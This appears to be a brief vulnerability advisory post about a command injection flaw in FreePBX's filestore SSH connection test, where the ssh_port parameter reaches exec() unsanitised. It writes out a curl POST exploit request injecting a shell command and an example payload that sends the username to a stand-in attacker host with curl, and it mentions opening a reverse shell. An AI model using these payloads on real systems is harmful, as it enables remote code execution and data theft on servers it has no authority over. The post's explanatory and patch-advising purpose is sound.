FreePBX, Command Injection, CVE-2023-45707 (High)

Listen to this Post

How the CVE Works:

The vulnerability exists within the `filestore` module’s `testconnection` functionality. An authenticated administrative user can send a crafted POST request to the `check_ssh_connect()` function. This function takes user-supplied input for the SSH host (ssh_host) and port (ssh_port) parameters. While the code uses `escapeshellarg()` on the host, the port is concatenated directly into a string that is passed to the `exec()` function without proper sanitization. By injecting shell metacharacters (like `;` or &) into the `ssh_port` parameter, an attacker can append arbitrary commands to the SSH connection test string. When the `exec()` function runs, both the intended command and the injected payload are executed on the underlying operating system with the privileges of the ‘asterisk’ user, leading to remote code execution.

dailycve form:

Platform: FreePBX Endpoint Manager
Version: 17.0.2.36 – 17.0.2.x
Vulnerability: Command Injection
Severity: HIGH
date:

Prediction: Patch Released

What Undercode Say:

`curl -X POST ‘https:///admin/admin/modules/filestore/drivers/SSH/testconnection.php’ -d ‘ssh_host=localhost&ssh_port=22;id’`

`grep -n “exec.ssh_port” /path/to/testconnection.php`

How Exploit:

Authenticated attacker sends POST request with malicious `ssh_port` parameter (e.g., `22; curl http://attacker.com/$(whoami)`). Injected command executes within `exec()` call, returning output or establishing a reverse shell.

Protection from this CVE:

Upgrade to version 17.0.3.

Impact:

Remote Code Execution as asterisk user.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top